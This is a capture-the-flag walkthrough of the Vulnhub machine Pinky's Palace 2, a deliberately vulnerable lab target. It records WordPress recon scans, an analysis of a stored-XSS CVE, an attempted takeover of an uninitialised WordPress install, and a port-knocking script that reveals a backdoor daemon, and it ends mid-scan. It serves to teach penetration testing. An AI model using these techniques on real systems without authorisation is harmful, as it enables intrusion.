Contents

Pinky’s Palace 2

This one, to cap off my linux machine list, is supposed to be one of the most difficult on Vulnhub. Let’s hope I do well, I’m treating this one like a test for if I had a strong fundamental for linux so I can feel confidant enough to move onto Windows for a few months.

1

Recon

  • Note From VulnHub: Wordpress will not render correctly. You will need to alter your host file with the IP shown on the console: echo 192.168.x.x pinkydb | sudo tee -a /etc/hosts
  • Difficulty to get entry: easy/medium
  • Difficulty to get root: medium/hard
  • Only works in VMWare
  • we must read /root/root.txt
  • Is ‘realistic’
  • Pictures show us a blog - it must be a webapp box
  • Released 18march 2018

Enumeration

$ sudo nmap -p- 192.168.2.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 22:50 EST
Nmap scan report for 192.168.2.24
Host is up (0.00029s latency).
All 65535 scanned ports on 192.168.2.24 are closed (65202) or filtered (333)
MAC Address: 08:D2:3E:25:52:56 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds

Intersting! Blocking basic nmap? Let’s try this…

$ nmap -sT -p- 192.168.2.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 23:13 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite

Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
└─$ nikto --host 192.168.2.24 --port 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    192.168.2.24
+ Target Port:        80
+ Start Time:         2021-02-28 22:51:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2021-02-28 22:52:38 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Let’s check that apache version for a quick root…

$ searchsploit apache 2.4.25
...
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation                  | linux/local/46676.php
...

Let’s follow that potential wp-version…
2

searchsploit wordpress 4.9.1
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
WordPress Core < 4.9.6 - (Authenticated)  | php/webapps/44949.txt
WordPress Core < 5.2.3 - Viewing Unauthen | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Den | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 -  | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60  | php/webapps/39553.txt
WordPress Plugin EZ SQL Reports < 4.11.37 | php/webapps/38176.txt
WordPress Plugin iThemes Security < 7.0.3 | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11. | php/webapps/48918.sh
WordPress Plugin User Role Editor < 4.25  | php/webapps/44595.rb
WordPress Plugin Userpro < 4.9.17.1 - Aut | php/webapps/43117.txt
WordPress Plugin UserPro < 4.9.21 - User  | php/webapps/46083.txt
------------------------------------------ ---------------------------------
Shellcodes: No Results

And checking out /secret
3

$ curl 192.168.2.24/secret/bambam.txt
8890
7000
666

pinkydb

Wtf? Maybe those are open ports…?

┌──(kali㉿kali)-[~/.ssh]
└─$ curl 192.168.2.24:8890                                              1 ⨯
curl: (7) Failed to connect to 192.168.2.24 port 8890: Connection refused
  
┌──(kali㉿kali)-[~/.ssh]
└─$ curl 192.168.2.24:7000                                              7 ⨯
curl: (7) Failed to connect to 192.168.2.24 port 7000: Connection refused
  
┌──(kali㉿kali)-[~/.ssh]
└─$ curl 192.168.2.24:666                                               7 ⨯
curl: (7) Failed to connect to 192.168.2.24 port 666: Connection refused

Phat Dirb:

└─$ dirb http://192.168.2.24 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb 28 23:03:43 2021
URL_BASE: http://192.168.2.24/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

  GENERATED WORDS: 20458

---- Scanning URL: http://192.168.2.24/ ----
 ==> DIRECTORY: http://192.168.2.24/secret/
+ http://192.168.2.24/server-status (CODE:403|SIZE:300)                    
  ==> DIRECTORY: http://192.168.2.24/wordpress/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/
  ==> DIRECTORY: http://192.168.2.24/wp-content/
  ==> DIRECTORY: http://192.168.2.24/wp-includes/
 
---- Entering directory: http://192.168.2.24/secret/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/ ----
 ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-includes/
 
---- Entering directory: http://192.168.2.24/wp-admin/ ----
 ==> DIRECTORY: http://192.168.2.24/wp-admin/css/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/images/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/includes/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/js/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/maint/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/network/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/user/
 
---- Entering directory: http://192.168.2.24/wp-content/ ----
 ==> DIRECTORY: http://192.168.2.24/wp-content/plugins/
  ==> DIRECTORY: http://192.168.2.24/wp-content/themes/
 
---- Entering directory: http://192.168.2.24/wp-includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/ ----
 ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/css/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/images/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/includes/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/js/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/maint/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/network/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/user/
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/ ----
 ==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/themes/
 
---- Entering directory: http://192.168.2.24/wordpress/wp-includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/css/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/images/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/js/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/maint/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/network/ ----
   
---- Entering directory: http://192.168.2.24/wp-admin/user/ ----
   
---- Entering directory: http://192.168.2.24/wp-content/plugins/ ----
 ==> DIRECTORY: http://192.168.2.24/wp-content/plugins/akismet/
 
---- Entering directory: http://192.168.2.24/wp-content/themes/ ----
   
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/css/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/images/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/js/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/maint/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/network/ ----
                     
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/user/ ----
     
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/ ----
==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/akismet/       
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/themes/ ----
     
---- Entering directory: http://192.168.2.24/wp-content/plugins/akismet/ ----
==> DIRECTORY: http://192.168.2.24/wp-content/plugins/akismet/_inc/            
==> DIRECTORY: http://192.168.2.24/wp-content/plugins/akismet/views/           
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/akismet/ ----
==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/akismet/_inc/  
==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/akismet/views/ 
 
---- Entering directory: http://192.168.2.24/wp-content/plugins/akismet/_inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-content/plugins/akismet/views/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/akismet/_inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/akismet/views/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
     
-----------------
END_TIME: Sun Feb 28 23:06:18 2021
DOWNLOADED: 327328 - FOUND: 1

Okay I can’t actually render any of that in the browser… are these false positives…? Let’s see if akismet has any vulns.

$ searchsploit akismet
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
WordPress Plugin Akismet - Multiple Cross-Site Scrip | php/webapps/37902.php
WordPress Plugin Akismet 2.1.3 - Cross-Site Scriptin | php/webapps/30036.html
----------------------------------------------------- ---------------------------------
Shellcodes: No Result
msf6 auxiliary(scanner/http/wordpress_scanner) > run

[*] Trying 192.168.2.24
[+] 192.168.2.24 - Detected Wordpress 4.9.4
[*] 192.168.2.24 - Enumerating plugins
[*] 192.168.2.24 - Progress      0/88009 (0.0%)
[*] 192.168.2.24 - Progress   1000/88009 (1.13%)
[*] 192.168.2.24 - Progress   2000/88009 (2.27%)
[*] 192.168.2.24 - Progress   3000/88009 (3.4%)
[+] 192.168.2.24 - Detected plugin: akismet version 4.0.2
[*] 192.168.2.24 - Progress   4000/88009 (4.54%)
[*] 192.168.2.24 - Progress   5000/88009 (5.68%)
[*] 192.168.2.24 - Progress   6000/88009 (6.81%)
[*] 192.168.2.24 - Progress   7000/88009 (7.95%)
[*] 192.168.2.24 - Progress   8000/88009 (9.08%)
[*] 192.168.2.24 - Progress   9000/88009 (10.22%)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
wpscan --url 192.168.2.24 --enumerate u                                                                                                                                1 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _\` | \'_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.13
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.2.24/ [192.168.2.24]
[+] Started: Sun Feb 28 23:40:55 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.2.24/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.2.24/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.2.24/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.2.24/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.2.24/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] pinky1337
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb 28 23:40:57 2021
[+] Requests Done: 26
[+] Cached Requests: 29
[+] Data Sent: 6.536 KB
[+] Data Received: 231.134 KB
[+] Memory used: 154.168 MB
[+] Elapsed time: 00:00:02

Huh, Xml RPC looks like it’s enabled eh?
4

Too bad all we can do with this is a DDoS attack…

Coming back to the Nmap… let’s lookup those port numbers and see if we can come up with anything.

I found that port 31337 is commonly used for Back Orifice backdoor, I wonder if we can use it? I dug into this a bunch and even if I found a build for BO2k, it’s password protected so it’s unlikely it would be useful for me.

I circled back to the CVE list for the wordpress version… https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-252523/Wordpress-Wordpress-4.9.4.html
There are lot of XSS vulnerabilities, and a PHP object injection that could lead to RCE, but they all require author/contributor accounts or login.

https://www.cvedetails.com/cve/CVE-2019-9787/ is an RCE for an unauthenticated user, and I did notice there is a place where I can comment on the wordpress site. Perhaps this is what we need!

Apparently, the WP comment code in this version looks like this:

if ( current_user_can( 'unfiltered_html' ) ) {
    if (! wp_verify_nonce( $_POST['_wp_unfiltered_html_comment'], 'unfiltered-html-comment' )) {
        $_POST['comment'] = wp_filter_post_kses($_POST['comment']);
    }
} else {
    $_POST['comment'] = wp_filter_kses($_POST['comment']);
}

There is a difference in the strictness of the filtering for an unauthenticated user versus an admin…

Quote:
‘This allows an attacker to create comments that can contain much more HTML tags and attributes than comments should usually be allowed to contain. However, although wp_filter_post_kses() is much more permissive, it still removes any HTML tags and attributes that could lead to Cross-Site-Scripting vulnerabilities.’

However, this snippet reconstructs links and provides a stored XSS:

    if (!empty($atts['rel'])) {
        // the processing of the 'rel' attribute happens here
        ⋮
        $text = '';
        foreach ($atts as $name => $value) {
            $text .= $name . '="' . $value . '" ';
        }
    }
    return '<a ' . $text . ' rel="' . $rel . '">';
}  

Example:
‘For example: would turn into
after processing.’

Okay cool, but for this to actually benefit me… I need a real admin to come along after me and use the site so I can hijack the session to abuse the root vulnerability of lack of CSRF. Fuck. Deadend? Either way, this is a stored XSS vulnerability. How we can chain that to an RCE I’m not sure yet due to the lack of real users mucking about on the page here. Do you think the author would go so far as to simulate an admin logging in? I don’t think so honestly…

I’ve still got nothing! I started running some more dirb type scanners, ZAP actually came up with some more juice:
5

TinyMCE eh?

└─$ searchsploit tinymce
------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                            |  Path
------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                      | php/webapps/4810.txt
CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion                            | php/webapps/34639.txt
Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)                | php/webapps/10183.php
MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload                          | php/webapps/15768.txt
TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities               | php/webapps/9296.txt
TinyMCE 2.0.1 - 'menuID' SQL Injection                                                    | php/webapps/7506.txt
TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload                                       | php/webapps/15194.txt
TinyMCE WYSIWYG Editor - Multiple Vulnerabilities                                         | php/webapps/11358.txt
WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure                 | php/webapps/19022.txt
------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Okay…
6

While poking around trying to match one of the tinymce plugins, I found this:
7

It looks like at /wordpress there’s an uninitialized wordpress instance running? Could I setup a database on my host, initialize this, upload a PHP web shell and get onto the machine? I think I could, right? I think I’ve finally found the hole!

Recap

  • Blocks basic Nmap scans (There may be more than just the webserver)
  • wordpress blog on port 80
  • Potential local PE with apache (I’ve never gotten that damn logrotate thing to work)
  • wordpress version probably Tested up to: 4.9.1, but is actually 4.9.4 from /wp-links-opml.php
  • some cryptic info at a text file (8890 7000 666 pinkydb)
  • akismet plugin is floating around there, and seems may have an XSS vulnerability we could use. (Nope, we found version and it’s too old)
  • username pinky1337 on wordpress
  • XmlRPC is enabled!
  • CVE-2018-20148 Seems like a valid in, but there’s minimal POC code available. It requires XmlRPC being enabled, which it is. However, it also requires authentication as a user which we don’t have.
  • CVE-2019-9787 is a stored XSS vulnerability that we should be able to use unauthenticated, but we need more in an attack chain to get pop a shell
  • TinyMCE seems to be present with what seems like mostly default plugins. This May be vulnerable
  • There seems to be an uninitalized wordpress instance at /wordpress, should be able to use this to get a shell!

# Exploitation
Alright, first we need to setup a database for this to connect to. We likely only have one shot at this, if we fuck up the configuration this door will be closed because we cannot edit the config.

$ sudo apt update
$ sudo apt install mariadb-server
$ service mysql start
$ sudo mysql
> CREATE DATABASE wordpress; 
> CREATE USER 'wordpress'@'localhost' IDENTIFIED BY 'password';
> GRANT ALL ON wordpress.* TO 'wordpress'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;
> CREATE USER 'wordpress'@'192.168.2.24' IDENTIFIED BY 'password';
> GRANT ALL ON wordpress.* TO 'wordpress'@'192.168.2.24' IDENTIFIED BY 'password' WITH GRANT OPTION;
> FLUSH PRIVILEGES;
> exit;

Fill in the web form…

8

Cross our fingers and….

9

Fuck. Another deadend. Psych. Moving back a step…

Enumeration Round 2

I really think I’ve gathered almost everything, at my current level of skill, that I know how to find without digging really deep. I’m going to spend some amount of time on the clues I have already…

Let’s focus for a while on what bambam.txt could be trying to tell us…

8890
7000
666

pinkydb

I know these are likely ports, especially with the reference to the hostname pinkydb… But they’re all closed ports I couldn’t do anything with them.

I did some research on the ports, couldn’t find anything specifically on what each may be. I Searched for ‘sequence of ports’ and got led to ‘port knocking’ which is quite interesting:

In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s). A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.[1][2][3][4]

The primary purpose of port knocking is to prevent an attacker from scanning a system for potentially exploitable services by doing a port scan, because unless the attacker sends the correct knock sequence, the protected ports will appear closed. 

That’s insanity honestly, I’ve never heard of such a thing. But the author went through enough effort to block the default nmap, perhaps that was a hint?

So basically:
- We attempt connections at the sequence of ports 8890, 7000, 777
- We Re-Scan with nmap
- Hopefully we see a new service pop up?

┌──(kali㉿kali)-[~]
└─$  nc -nv 192.168.2.24 8890
(UNKNOWN) [192.168.2.24] 8890 (?) : Connection refused
                                                                                
┌──(kali㉿kali)-[~]
└─$  nc -nv 192.168.2.24 7000                                               1 ⨯
(UNKNOWN) [192.168.2.24] 7000 (bbs) : Connection refused
                                                                                
┌──(kali㉿kali)-[~]
└─$  nc -nv 192.168.2.24 666                                                1 ⨯
(UNKNOWN) [192.168.2.24] 666 (?) : Connection refused
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -sT -p- 192.168.2.24                                               1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:02 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00051s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite

Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds

…no, I should do some more research and how to actually initiate this, it’s probably not this simple. A quick search for nmap port-knocking…
Here’s a little guide from OWASP about how to do this:
https://sushant747.gitbooks.io/total-oscp-guide/content/port_knocking.html

Oh cool of course someone wrote a CLI for this…

$ apt-get install knockd


# Run Before Scan
$ sudo nmap -sT -p-  192.168.2.24
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:30 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00047s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite
MAC Address: 08:D2:3E:25:52:56 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds

# Create Knock Script
echo "\
knock -v 192.168.2.24 8890 7000 666
knock -v 192.168.2.24 8890 666 7000
knock -v 192.168.2.24 666 7000 8890
knock -v 192.168.2.24 666 8890 7000
knock -v 192.168.2.24 7000 8890 666
knock -v 192.168.2.24 7000 666 8890" > x.sh

└─$ sh x.sh                                                                                                                                            2 ⨯
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:8890

$ sudo nmap -sT -p-  192.168.2.24
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:56 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00032s latency).
Not shown: 65322 closed ports, 210 filtered ports
PORT      STATE SERVICE
4655/tcp  open  unknown
7654/tcp  open  unknown
31337/tcp open  Elite
MAC Address: 08:D2:3E:25:52:56 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds

Oh? Now those ports are no longer filtered, but opened! Holy shit fun!

┌──(kali㉿kali)-[~/scripts/port_knock]
└─$ nc 192.168.2.24 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky's Palace.
=>

And now when we nc onto 31337 we get a little shell?

=> ls
ls

Looks like it just echo’s commands back at us… could probably escape out of this?

$ nc 192.168.2.24 4655 
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3

Port 4655 is SSH.

┌──(kali㉿kali)-[~/scripts/port_knock]
└─$  nc 192.168.2.24 7654                                                                                                                            127 ⨯
^C
                                                                                                                                                           
┌──(kali㉿kali)-[~/scripts/port_knock]
└─$ curl 192.168.2.24:7654                                                                                                                             1 ⨯
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>

port 7654 appears to be a web server?

$ nikto --host 192.168.2.24 --port 7654
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    192.168.2.24
+ Target Port:        7654
+ Start Time:         2021-03-01 16:01:58 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2021-03-01 16:02:21 (GMT-5) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ dirb http://192.168.2.24:7654 /usr/share/wordlists/dirb/big.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar  1 16:03:29 2021
URL_BASE: http://192.168.2.24:7654/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.2.24:7654/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/                                          
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/ ----
+ http://192.168.2.24:7654/apache/.htaccess (CODE:200|SIZE:235)                          
==> DIRECTORY: http://192.168.2.24:7654/apache/secret/                                   
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/                                
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/                                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/                               
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/                              
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/secret/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/                       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/                     
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/                    
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/                             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/images/                          
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/includes/                        
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/js/                              
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/maint/                           
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/network/                         
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/user/                            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/                       
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/themes/                        
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/certificates/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/css/                          
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/customize/                    
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/fonts/                        
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/                       
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/                           
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/widgets/                      
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/                   
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/images/                
